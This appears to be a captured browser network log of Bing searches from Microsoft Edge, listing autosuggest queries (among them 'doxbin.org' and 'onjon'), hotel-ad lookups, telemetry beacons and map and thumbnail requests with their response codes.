GET https://www.bing.com/qbox?query=doxbin.or&language=en-US&pt=EdgBox&cvid=3e9d1f0e90bd4b45aaa059bd0cd1dc49&ig=489cef14ffc046268cd830ae6284f266&oit=1&cp=9&pgcl=9

HTTP Response

200

HTTP Request

GET https://www.bing.com/qbox?query=doxbin.org&language=en-US&pt=EdgBox&cvid=3e9d1f0e90bd4b45aaa059bd0cd1dc49&ig=ab3a2201501147c59fac06d88bda929d&oit=3&cp=10&pgcl=9

HTTP Response

200

HTTP Request

POST https://www.bing.com/fd/ls/ls.gif?IG=5AD7030C91584719B4F5E41231459495&Type=Event.ClientInst&DATA={%22T%22:%22CI.Unload%22,%22Name%22:%22D%22,%22AppNS%22:%22SERP%22,%22TS%22:1733306910514}&log=UserEvent

HTTP Response

200

HTTP Request

POST https://www.bing.com/fd/ls/lsp.aspx

HTTP Request

POST https://www.bing.com/fd/ls/lsp.aspx

HTTP Request

POST https://www.bing.com/fd/ls/lsp.aspx

HTTP Request

POST https://www.bing.com/fd/ls/lsp.aspx

HTTP Response

204

HTTP Response

204

HTTP Response

204

HTTP Request

GET https://www.bing.com/qbox?query=o&language=en-US&pt=EdgBox&cvid=00ce9ee6199e4a5db1785c0696c690a3&ig=5cebc1b4bcac4fe0bc40691bed227a34&oit=1&cp=1&pgcl=4

HTTP Response

200

HTTP Request

GET https://www.bing.com/qbox?query=on&language=en-US&pt=EdgBox&cvid=00ce9ee6199e4a5db1785c0696c690a3&ig=f81094f58a89400c866d8e3fd782e110&oit=1&cp=2&pgcl=4

HTTP Response

200

HTTP Request

GET https://www.bing.com/qbox?query=onj&language=en-US&pt=EdgBox&cvid=00ce9ee6199e4a5db1785c0696c690a3&ig=b69b6b05a0fb4e4f962b411b4e6655f0&oit=1&cp=3&pgcl=4

HTTP Response

200

HTTP Request

GET https://www.bing.com/qbox?query=onjo&language=en-US&pt=EdgBox&cvid=00ce9ee6199e4a5db1785c0696c690a3&ig=a15aaa14be3d447a9a36d03a4909c73a&oit=1&cp=4&pgcl=4

HTTP Response

200

HTTP Request

GET https://www.bing.com/qbox?query=onjon&language=en-US&pt=EdgBox&cvid=00ce9ee6199e4a5db1785c0696c690a3&ig=70afd18e3358471490dad4f4015c4bcc&oit=1&cp=5&pgcl=4

HTTP Response

200

HTTP Request

GET https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&Type=Event.CPT&DATA={%22pp%22:{%22S%22:%22L%22,%22FC%22:60,%22BC%22:339,%22SE%22:-1,%22TC%22:-1,%22H%22:449,%22BP%22:457,%22CT%22:461,%22IL%22:25},%22ad%22:[-1,-1,1263,601,1263,3772,1],%22net%22:%22undefined%22}&P=SERP&DA=DUBE01

HTTP Request

POST https://www.bing.com/fd/ls/lsp.aspx?

HTTP Request

GET https://www.bing.com/local/hotelads?q=onjon&inDate=01/19/2025&outDate=01/20/2025&entityid=YN2000x1190976147452155201,YN1545x256073263,YN2000x6096471577638952817,YN2000x1190976147452155201,YN1544x243384812,YN2000x9391523170225958935,YN2000x4457774376323358039,YN2000x10959879645415552720,YN2000x11722354772439687545&IID=5672&source=serpls&usrd=false&frt=json&form=ANAB01&pc=U531&originig=6AB2CD56EF6C4338BF41C655438BDF1B&IG=6AB2CD56EF6C4338BF41C655438BDF1B

HTTP Request

POST https://www.bing.com/travelhotelrentalpackages/api/v1/hotel/providerpricelist?IG=6AB2CD56EF6C4338BF41C655438BDF1B&IID=5672

HTTP Response

200

HTTP Response

204

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.Init%22%2C%22TS%22%3A1733306920174%2C%22Name%22%3A%22Base%22%2C%22FID%22%3A%22CI%22%7D%2C%7B%22Rtt%22%3A%22100%22%2C%22Downlink%22%3A%2210%22%2C%22T%22%3A%22CI.NetworkPerformance%22%2C%22TS%22%3A1733306920174%2C%22Name%22%3A%22timinginfo%22%2C%22FID%22%3A%22NetworkPerformanceDetails%22%7D%2C%7B%22T%22%3A%22CI.SCArrST%22%2C%22TS%22%3A1733306920180%2C%22Name%22%3A481%2C%22FID%22%3A%22SCArrST%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306920180%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22EdgeSpoofing%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306920180%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22DM%22%7D%5D

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306920180%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22DARKMODE%22%7D%5D

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&Type=Event.ClientInst&DATA=[{%22T%22:%22Info%22,%22FID%22:%22CI%22,%22Name%22:%22HasRR%22,%22Text%22:%221%22}]

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&TYPE=Event.ClientInst&DATA=%5B%7B%22width%22%3A%221280%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306920180%2C%22Name%22%3A%22M%22%2C%22FID%22%3A%22BRW%22%7D%2C%7B%22height%22%3A%22601%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306920180%2C%22Name%22%3A%22S%22%2C%22FID%22%3A%22BRH%22%7D%2C%7B%22RawDPR%22%3A%221.0%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306920180%2C%22Name%22%3A%221.0%22%2C%22FID%22%3A%22DPR%22%7D%2C%7B%22T%22%3A%22CI.NumGuestFltrNotFound%22%2C%22TS%22%3A1733306920180%2C%22Name%22%3A%22NumGuestsFltrEvent%22%2C%22FID%22%3A%22HotelListing%22%7D%2C%7B%22T%22%3A%22CI.Price%22%2C%22TS%22%3A1733306920402%2C%22Name%22%3A%22OCardCount%5B6%5D%22%2C%22FID%22%3A%22HotelPrices%22%7D%2C%7B%22ypid%22%3A%22YN2000x1190976147452155201%22%2C%22T%22%3A%22CI.Price%22%2C%22TS%22%3A1733306920402%2C%22Name%22%3A%22%C2%A399%22%2C%22FID%22%3A%22HotelPrices%22%7D%5D

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&TYPE=Event.ClientInst&DATA=%5B%7B%22ypid%22%3A%22YN1545x256073263%22%2C%22T%22%3A%22CI.Price%22%2C%22TS%22%3A1733306920402%2C%22Name%22%3A%22%22%2C%22FID%22%3A%22HotelPrices%22%7D%5D

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&TYPE=Event.ClientInst&DATA=%5B%7B%22ypid%22%3A%22YN2000x6096471577638952817%22%2C%22T%22%3A%22CI.Price%22%2C%22TS%22%3A1733306920402%2C%22Name%22%3A%22%C2%A339%22%2C%22FID%22%3A%22HotelPrices%22%7D%5D

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&TYPE=Event.ClientInst&DATA=%5B%7B%22ypid%22%3A%22YN1544x243384812%22%2C%22T%22%3A%22CI.Price%22%2C%22TS%22%3A1733306920402%2C%22Name%22%3A%22%C2%A362%22%2C%22FID%22%3A%22HotelPrices%22%7D%5D

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&TYPE=Event.ClientInst&DATA=%5B%7B%22ypid%22%3A%22YN2000x9391523170225958935%22%2C%22T%22%3A%22CI.Price%22%2C%22TS%22%3A1733306920402%2C%22Name%22%3A%22%C2%A366%22%2C%22FID%22%3A%22HotelPrices%22%7D%5D

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.SERPSB%22,%22FID%22:%22CI%22,%22Name%22:%22CharCount%22,%22Text%22:%225%22}]

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.SERPSB%22,%22FID%22:%22CI%22,%22Name%22:%22LandingRows%22,%22Text%22:%221%22}]

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://www.bing.com/images/sbi?mmasync=1&ig=6AB2CD56EF6C4338BF41C655438BDF1B&iid=.5097&ptn=Web&ep=0&iconpl=1

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&TYPE=Event.ClientInst&DATA=%5B%7B%22Time%22%3A947%2C%22time%22%3A957%2C%22T%22%3A%22CI.Latency%22%2C%22TS%22%3A1733306920516%2C%22Name%22%3A%22Loaded%22%2C%22FID%22%3A%22HP%22%7D%5D

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&TYPE=Event.ClientInst&DATA=%5B%7B%22comp%22%3A%22loaded%22%2C%22time%22%3A958%2C%22T%22%3A%22CI.Data%22%2C%22TS%22%3A1733306920517%2C%22Name%22%3A%22speech%22%2C%22FID%22%3A%22HP%22%7D%5D

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&TYPE=Event.ClientInst&DATA=%5B%7B%22micComponent%22%3A%22rendered%22%2C%22time%22%3A958%2C%22T%22%3A%22CI.Data%22%2C%22TS%22%3A1733306920517%2C%22Name%22%3A%22speech%22%2C%22FID%22%3A%22HP%22%7D%5D

HTTP Request

POST https://www.bing.com/rewardsapp/ncheader?ver=51619320&IID=SERP.5054&IG=6AB2CD56EF6C4338BF41C655438BDF1B

HTTP Request

POST https://www.bing.com/rewardsapp/reportActivity?IG=6AB2CD56EF6C4338BF41C655438BDF1B&IID=SERP.5063&q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22thumb_tum34%22}]

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22thumb_f34%22}]

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22sb_feedback%22}]

HTTP Request

POST https://www.bing.com/fd/ls/lsp.aspx?

HTTP Request

GET https://www.bing.com/local/hotelprice?q=Hotels&filters=local_filters%3a%22UR4U%22+hotel_filters%3a%22LHP-0_HHP-%C2%A3500+_SD-01192025_ED-01202025%22+segment%3a%22Hotel%22+cacheid%3a%2244bd5e00-6963-40ea-85f1-37643e69d2a1%22&count=100&htlsource=localhp&originig=6AB2CD56EF6C4338BF41C655438BDF1B&inDate=01/19/2025&outDate=01/20/2025&localypids=YN2000x1190976147452155201|48.32417678833008|4.305159091949463,YN1545x256073263|48.36305618286133|4.332777976989746,YN2000x6096471577638952817|48.29521179199219|4.135970115661621,YN2000x1190976147452155201|48.32417678833008|4.305159091949463,YN1544x243384812|48.328407287597656|4.115884780883789,YN2000x9391523170225958935|48.42100524902344|4.479507923126221,YN2000x4457774376323358039|48.33100891113281|4.099302768707275,YN2000x10959879645415552720|48.45736312866211|4.123088836669922,YN2000x11722354772439687545|48.42161560058594|4.480012893676758

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&TYPE=Event.ClientInst&DATA=%5B%7B%22correlationId%22%3A%2267502a30b43d42db97a6d5f3260af01d%22%2C%22T%22%3A%22CI.acclink%22%2C%22TS%22%3A1733306920524%2C%22Name%22%3A%22loadJsModule%22%2C%22FID%22%3A%22init%22%7D%2C%7B%22correlationId%22%3A%2267502a30b43d42db97a6d5f3260af01d%22%2C%22T%22%3A%22CI.acclink%22%2C%22TS%22%3A1733306920524%2C%22Name%22%3A%22undirectflow%22%2C%22FID%22%3A%22init%22%7D%2C%7B%22T%22%3A%22CI.OpalUpsell%22%2C%22TS%22%3A1733306920550%2C%22Name%22%3A%22Show%22%2C%22FID%22%3A%2214utojb6_14yb1dlu%22%7D%2C%7B%22T%22%3A%22CI.OpalUpsell%22%2C%22TS%22%3A1733306920550%2C%22Name%22%3A%22overlap%22%2C%22FID%22%3A%22Hide%22%7D%2C%7B%22T%22%3A%22CI.OpalUpsell%22%2C%22TS%22%3A1733306920550%2C%22Name%22%3A%22overlap%22%2C%22FID%22%3A%22Hide%22%7D%2C%7B%22osBuildVersion%22%3A%5B%2210%22%2C%220%22%2C%2222000%22%5D%2C%22isWin11OrHigher%22%3A%22true%22%2C%22fullOsBuild%22%3A%2210.0.22000%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306920582%2C%22Name%22%3A%22OSBuild%22%2C%22FID%22%3A%22OSBuild%22%7D%2C%7B%22T%22%3A%22CI.Tab%22%2C%22TS%22%3A1733306920763%2C%22Name%22%3A%221%22%2C%22FID%22%3A%22count%22%7D%2C%7B%22SuppressingFeature%22%3A%22HotelsLGWidget%22%2C%22T%22%3A%22CI.LeftGutterUtility%22%2C%22TS%22%3A1733306920799%2C%22Name%22%3A%22LGSuppressed%22%2C%22FID%22%3A%22HotelsLGWidget%22%7D%2C%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1733306920858%2C%22Name%22%3A%22PromptDevLoc%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1733306920858%2C%22Name%22%3A%22Perm_Available%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&TYPE=Event.ClientInst&DATA=%5B%7B%22Text%22%3A%220%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306920888%2C%22Name%22%3A%22web%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%221%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306920888%2C%22Name%22%3A%22conv%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%222%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306920888%2C%22Name%22%3A%22images%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%223%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306920888%2C%22Name%22%3A%22video%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%224%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306920888%2C%22Name%22%3A%22local%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%225%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306920888%2C%22Name%22%3A%22news%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%226%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306920888%2C%22Name%22%3A%22shop%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%227%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306920888%2C%22Name%22%3A%22flights%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%228%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306920888%2C%22Name%22%3A%22travelhub%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%229%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306920888%2C%22Name%22%3A%22hotels%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%2210%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306920888%2C%22Name%22%3A%22realestate%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Fallback%22%3A%221%22%2C%22IsRewardUser%22%3A%22%22%2C%22IsAutoOpenFlyout%22%3A%22%22%2C%22SuppressionReason%22%3A%22NoTrigger%3AMuidTrialNotEnoughPoints%22%2C%22FID%22%3A%22ModernRewardsFlyout%22%2C%22EventName%22%3A%22AutoOpenFlyoutFired%22%2C%22T%22%3A%22CI.Init%22%2C%22TS%22%3A1733306920888%2C%22Name%22%3A%22AutoOpenFlyoutFired%22%7D%5D

HTTP Request

GET https://www.bing.com/geolocation/write?isBlocked=true&sid=1389AFCAD5F46BB6263EBA81D45C6A43&clientsid=undefined

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1733306920891%2C%22Name%22%3A%22Perm_Denied%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1733306920891%2C%22Name%22%3A%22block%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1733306920891%2C%22Name%22%3A%22tryBlock%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

204

HTTP Request

GET https://www.bing.com/maps/mapcontrol/v9/overlay?callback=initializeMap&partner=serp&branch=experimental

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.ASBundleLoad%22%2C%22TS%22%3A1733306920919%2C%22Name%22%3A%22AutoSuggestBootstrap%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22LoadTime%22%3A%22639.500000019325%22%2C%22T%22%3A%22CI.AutosuggestBootstrapLoaded%22%2C%22TS%22%3A1733306920925%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22LoadTime%22%3A%221359.500000020489%22%2C%22T%22%3A%22CI.AutosuggestJSBundleLoaded%22%2C%22TS%22%3A1733306920925%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1733306920984%2C%22Name%22%3A%22BlockSuccess%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://www.bing.com/maps/instrumentation?version=V9&q=&feature=omo

HTTP Response

200

HTTP Request

POST https://www.bing.com/fd/ls/lsp.aspx?

HTTP Response

204

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22tdd_feedback%22}]

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22tdd_exit%22}]

HTTP Response

200

HTTP Response

200

HTTP Request

POST https://www.bing.com/fd/ls/lsp.aspx

HTTP Request

POST https://www.bing.com/fd/ls/lsp.aspx?

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22mapsOptOut%22}]

HTTP Response

204

HTTP Response

204

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.NumGuestFltrNotFound%22%2C%22TS%22%3A1733306921399%2C%22Name%22%3A%22NumGuestsFltrEvent%22%2C%22FID%22%3A%22HotelListing%22%7D%5D

HTTP Response

200

HTTP Request

GET https://www.bing.com/AS/Suggestions?pt=page.serp&bq=onjon&mkt=en-gb&qry=onjon&cp=5&csr=1&zis=1&msbqf=false&pths=1&cvid=6AB2CD56EF6C4338BF41C655438BDF1B

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22sb_fdb%22}]

HTTP Response

200

HTTP Request

POST https://www.bing.com/fd/ls/lsp.aspx

HTTP Response

204

HTTP Request

POST https://www.bing.com/fd/ls/lsp.aspx

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.SpSbInteract%22%2C%22TS%22%3A1733306925387%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aonjon%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1733306925391%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aonjon%22%2C%22AsResponseLength%22%3A%22409%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1733306925491%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aonjon%2Cig%3AEA9C665A0C9B4F1F9D95E0FFB57F2681%22%2C%22AnswerInfo%22%3A%22HS%3B5%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1733306925522%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Ar%2Ci%3A1%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1733306926338%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22sbox%22%3A%22typing%22%2C%22time%22%3A6780%2C%22T%22%3A%22CI.Data%22%2C%22TS%22%3A1733306926340%2C%22Name%22%3A%22speech%22%2C%22FID%22%3A%22HP%22%7D%5D

HTTP Response

204

HTTP Request

GET https://www.bing.com/AS/Suggestions?pt=page.serp&bq=onjon&mkt=en-gb&qry=r&cp=1&csr=1&msbqf=false&pths=1&cvid=6AB2CD56EF6C4338BF41C655438BDF1B

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://www.bing.com/th?id=OSK.11014e0765e9a4f0689f2c62e5ca1b80&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

HTTP Request

GET https://www.bing.com/th?id=OSK.8JEs-_9SBUAPjLqFn45NoNbV1rqTVAJasIJxoVnDmzg&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

HTTP Request

GET https://www.bing.com/th?id=OSK.IoDK89DR0ggBFHTUt_fKGWWckTTUOST9im2yC05L_vE&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://www.bing.com/th?id=OSK.13XI46tVoIFX00fKdIBEvJi6lXDSynInKXy7GYU64tk&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

HTTP Request

GET https://www.bing.com/th?id=OSK.6HViEQck5PfB5ZNZtnLaye1sYG1erhA5vkKUiBapkFU&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

HTTP Request

GET https://www.bing.com/th?id=OSK.ZvozU4jjiCh_V9_lOHMBQBhRvbwvMLLc_s1-DUpcmcs&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

HTTP Request

GET https://www.bing.com/th?id=OSK.Ckdj22N7IFhNPZ5EsY3v_khocb9UYJkt04rvnlYp7i0&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

HTTP Request

GET https://www.bing.com/th?id=OSK.11014e0765e9a4f0689f2c62e5ca1b80&w=175&h=120&qlt=120&c=6&rs=1&cdv=1&pid=RS

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://www.bing.com/AS/Suggestions?pt=page.serp&bq=onjon&mkt=en-gb&qry=&cp=0&csr=1&msbqf=false&pths=1&cvid=6AB2CD56EF6C4338BF41C655438BDF1B

HTTP Response

200

HTTP Request

GET https://www.bing.com/AS/Suggestions?pt=page.serp&bq=onjon&mkt=en-gb&qry=d&cp=1&csr=1&msbqf=false&pths=1&cvid=6AB2CD56EF6C4338BF41C655438BDF1B

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&TYPE=Event.ClientInst&DATA=%5B%7B%22Meta%22%3A%22q%3Ar%2Ci%3A1%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1733306926381%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Ar%2Ci%3A1%22%2C%22AsResponseLength%22%3A%221778%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1733306926464%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Ar%2Ci%3A1%2Cig%3AD1814F619C88487C96E2DAEED0C3E754%22%2C%22AnswerInfo%22%3A%22MB%3B6%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1733306926464%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Ar%2Ci%3A1%22%2C%22T%22%3A%22CI.GhostingLatency%22%2C%22TS%22%3A1733306926469%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Namespace%22%3A%22AutoSuggest%22%2C%22EventType%22%3A%22TextGhostingSuggest%22%2C%22CustomData%22%3A%22%7B%5C%22PL%5C%22%3A1%2C%20%5C%22GL%5C%22%3A5%2C%20%5C%22IG%5C%22%3A%5C%22D1814F619C88487C96E2DAEED0C3E754%5C%22%7D%22%2C%22T%22%3A%22CI.SystemEvent%22%2C%22TS%22%3A1733306926469%2C%22Name%22%3A%22Ghosting%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3A%2Ci%3A2%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1733306926965%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3A%2Ci%3A2%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1733306926998%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3A%2Ci%3A2%22%2C%22AsResponseLength%22%3A%22762%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1733306927105%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3A%2Ci%3A2%2Cig%3A07EB357199DC411687BECD6CB9445273%22%2C%22AnswerInfo%22%3A%22HS%3B5%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1733306927105%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Ad%2Ci%3A3%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1733306927179%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%5D

HTTP Response

200

HTTP Response

200

HTTP Request

